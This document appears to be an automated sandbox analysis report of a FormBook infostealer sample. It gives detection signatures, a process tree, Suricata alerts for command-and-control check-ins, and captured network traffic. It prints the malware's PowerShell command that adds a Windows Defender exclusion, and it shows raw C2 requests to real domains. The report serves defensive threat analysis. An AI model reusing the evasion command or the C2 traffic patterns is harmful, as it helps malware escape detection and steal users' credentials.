Edit tour

Windows Analysis Report
SLq0ulC3Wf.exe

Overview

General Information

Sample name:	SLq0ulC3Wf.exe renamed because original name is a hash value
Original sample name:	2a39456047c17169357a4065aaae2dace49a63d160633f59c9049f6eabc9cc4f.exe
Analysis ID:	1588792
MD5:	f8048121980af794fbe2e41741244055
SHA1:	4785f7e68464cde2eafeec459f437e7e422ab47a
SHA256:	2a39456047c17169357a4065aaae2dace49a63d160633f59c9049f6eabc9cc4f
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

SLq0ulC3Wf.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\SLq0ulC3Wf.exe" MD5: F8048121980AF794FBE2E41741244055)

powershell.exe (PID: 7604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7796 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

SLq0ulC3Wf.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\SLq0ulC3Wf.exe" MD5: F8048121980AF794FBE2E41741244055)

SLq0ulC3Wf.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\SLq0ulC3Wf.exe" MD5: F8048121980AF794FBE2E41741244055)

SLq0ulC3Wf.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\SLq0ulC3Wf.exe" MD5: F8048121980AF794FBE2E41741244055)

aVqyFNVyPiTfi.exe (PID: 3920 cmdline: "C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

DpiScaling.exe (PID: 8076 cmdline: "C:\Windows\SysWOW64\DpiScaling.exe" MD5: D44D3A0F5E53F6ECC5C6232930CFCC5E)

aVqyFNVyPiTfi.exe (PID: 4064 cmdline: "C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 3636 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2678439595.00000000044C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.1717773324.0000000001490000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2678329827.0000000004470000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.1717366921.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.2681761617.0000000005110000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.2678402729.00000000028E0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.1726811680.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: SLq0ulC3Wf.exe PID: 7416	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.SLq0ulC3Wf.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
7.2.SLq0ulC3Wf.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SLq0ulC3Wf.exe", ParentImage: C:\Users\user\Desktop\SLq0ulC3Wf.exe, ParentProcessId: 7416, ParentProcessName: SLq0ulC3Wf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe", ProcessId: 7604, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SLq0ulC3Wf.exe", ParentImage: C:\Users\user\Desktop\SLq0ulC3Wf.exe, ParentProcessId: 7416, ParentProcessName: SLq0ulC3Wf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe", ProcessId: 7604, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T05:35:39.706183+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49714	176.57.65.76	80	TCP
2025-01-11T05:35:42.276868+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49715	176.57.65.76	80	TCP
2025-01-11T05:35:44.941736+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49716	176.57.65.76	80	TCP
2025-01-11T05:35:52.987839+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49718	199.59.243.228	80	TCP
2025-01-11T05:35:55.549880+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49720	199.59.243.228	80	TCP
2025-01-11T05:35:58.237986+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49722	199.59.243.228	80	TCP
2025-01-11T05:36:14.626815+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49724	209.74.79.40	80	TCP
2025-01-11T05:36:17.160655+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49725	209.74.79.40	80	TCP
2025-01-11T05:36:19.716227+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49726	209.74.79.40	80	TCP
2025-01-11T05:36:27.981919+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49728	136.243.225.5	80	TCP
2025-01-11T05:36:30.512696+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49729	136.243.225.5	80	TCP
2025-01-11T05:36:33.058587+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49730	136.243.225.5	80	TCP
2025-01-11T05:36:41.522782+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49732	185.68.108.243	80	TCP
2025-01-11T05:36:44.765305+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49733	185.68.108.243	80	TCP
2025-01-11T05:36:47.297564+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49734	185.68.108.243	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.accusolution.pro/8s4j/	Avira URL Cloud: Label: malware
Source: http://www.accusolution.pro	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: SLq0ulC3Wf.exe	Virustotal: Detection: 76%			Perma Link
Source: SLq0ulC3Wf.exe	ReversingLabs: Detection: 68%

Yara detected FormBook

Source: Yara match	File source: 7.2.SLq0ulC3Wf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SLq0ulC3Wf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2678439595.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1717773324.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2678329827.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1717366921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2681761617.0000000005110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2678402729.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1726811680.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SLq0ulC3Wf.exe

Joe Sandbox ML: detected

Source: SLq0ulC3Wf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SLq0ulC3Wf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aVqyFNVyPiTfi.exe, 0000000A.00000002.2677321195.0000000000EDE000.00000002.00000001.01000000.0000000C.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000002.2678560220.0000000000EDE000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: SLq0ulC3Wf.exe, 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000003.1745690316.00000000043A5000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000003.1748153524.000000000455A000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: SLq0ulC3Wf.exe, SLq0ulC3Wf.exe, 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, DpiScaling.exe, 0000000B.00000003.1745690316.00000000043A5000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000003.1748153524.000000000455A000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: DpiScaling.pdb source: SLq0ulC3Wf.exe, 00000007.00000002.1717907808.0000000001537000.00000004.00000020.00020000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000A.00000003.1963997440.0000000000C9B000.00000004.00000001.00020000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000A.00000002.2676810505.0000000000C88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DpiScaling.pdbGCTL source: SLq0ulC3Wf.exe, 00000007.00000002.1717907808.0000000001537000.00000004.00000020.00020000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000A.00000003.1963997440.0000000000C9B000.00000004.00000001.00020000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000A.00000002.2676810505.0000000000C88000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\DpiScaling.exe

Code function: 11_2_0069CE10 FindFirstFileW,FindNextFileW,FindClose,

11_2_0069CE10

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 4x nop then xor eax, eax		11_2_00689F00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 4x nop then mov ebx, 00000004h		11_2_045C04E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49716 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49725 -> 209.74.79.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49722 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49729 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49726 -> 209.74.79.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49733 -> 185.68.108.243:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49728 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49724 -> 209.74.79.40:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49720 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49730 -> 136.243.225.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49732 -> 185.68.108.243:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49734 -> 185.68.108.243:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.futurexz.xyz

Source: Joe Sandbox View

IP Address: 194.245.148.189 194.245.148.189

Source: Joe Sandbox View	ASN Name: TELINEABA TELINEABA
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /a8nx/?5t=+ijtfUcEkczZonQRTZPeCxhL9X8p6elqT8rXZI1bhPKlL7JJ7DdsZ8/v+QWmOaPAOWgXu8Ydnt1hKQQAhZJ0bRYUhQdmCWF4tv0qdRrQh94dvG1MWUFKQN4qjMNIFbhY/Q==&HBa8C=1TmdP6ixExB8DV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.did-ready.infoUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /67jc/?5t=kDkUHRN5t7dj/L6paso6inXd6eXYDn0Z28RJcX0ruebcxps2UknIHDMRpo6SPn5cYwuXhe648Q1lIcrqVg3rU30TGEOcT5RW1p1cw9XoFAJbkTUsrX+CZQm6ftBIq+2JBw==&HBa8C=1TmdP6ixExB8DV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.newbh.proUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /k45z/?5t=Hhv1IBz65eD70HjhCg9ywsDykByP0cXiBlXjDO6l9OvALlXnnYphilqBzmviCqMlGACPw9TT4DmHF7/s/4Bbg8ZTQ9OS97MohncYSMMJNOepQVGz5jqmT1tBqJmbKI6tkg==&HBa8C=1TmdP6ixExB8DV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.deadshoy.techUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /bhaz/?HBa8C=1TmdP6ixExB8DV&5t=d3C+EkBuN5s1g6Sv3GF5Q4rw9r47fZ2/rALJg63gfJf8n+sIpfLA3JNW/O2di/HTM2qVhQtzuGVJ+YLVpF6sno4g+T4cgfV0eNxqgD8f0kMZrnEaQO6gqyS7ZB9ZPZm+NQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.futurexz.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /wzdf/?5t=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/9Z3uNAs5avQYsDK6NbrpTb32/24MPrQp38e7p8QhR5ymoCju/e2gY+T/ibiLi+AS7/Eveg==&HBa8C=1TmdP6ixExB8DV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.myfastuploader.sbsUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.did-ready.info
Source: global traffic	DNS traffic detected: DNS query: www.newbh.pro
Source: global traffic	DNS traffic detected: DNS query: www.deadshoy.tech
Source: global traffic	DNS traffic detected: DNS query: www.spindisclite.store
Source: global traffic	DNS traffic detected: DNS query: www.futurexz.xyz
Source: global traffic	DNS traffic detected: DNS query: www.myfastuploader.sbs
Source: global traffic	DNS traffic detected: DNS query: www.accusolution.pro

Source: unknown

HTTP traffic detected: POST /67jc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-usConnection: closeCache-Control: no-cacheContent-Length: 203Content-Type: application/x-www-form-urlencodedHost: www.newbh.proOrigin: http://www.newbh.proReferer: http://www.newbh.pro/67jc/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 35 74 3d 70 42 4d 30 45 6c 4e 75 7a 70 35 44 6f 61 62 77 4d 65 35 59 6e 47 32 6d 76 70 50 63 56 58 4d 79 37 63 74 67 62 6b 63 75 6b 4e 4f 79 6e 62 6c 6b 4b 54 66 72 48 56 41 58 6b 59 79 62 4c 48 56 48 53 52 53 67 6c 4b 65 43 6a 43 30 47 4b 74 33 78 55 52 66 76 62 32 31 4a 41 6c 37 77 52 72 30 71 6f 37 67 53 77 4d 71 5a 47 68 74 71 78 68 67 2f 70 32 4b 4c 58 54 33 68 59 49 74 47 71 74 72 7a 61 71 79 70 48 6f 54 75 6b 30 79 65 73 61 43 68 56 45 63 4f 32 67 6f 6c 58 31 47 53 65 75 65 70 4d 42 7a 49 30 4f 2f 44 42 4e 76 4f 46 77 74 53 59 59 54 2b 68 35 58 5a 4a 71 53 4e 34 57 4b 46 6f 4e 42 52 49 54 67 3d Data Ascii: 5t=pBM0ElNuzp5DoabwMe5YnG2mvpPcVXMy7ctgbkcukNOynblkKTfrHVAXkYybLHVHSRSglKeCjC0GKt3xURfvb21JAl7wRr0qo7gSwMqZGhtqxhg/p2KLXT3hYItGqtrzaqypHoTuk0yesaChVEcO2golX1GSeuepMBzI0O/DBNvOFwtSYYT+h5XZJqSN4WKFoNBRITg=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:36:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:36:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta 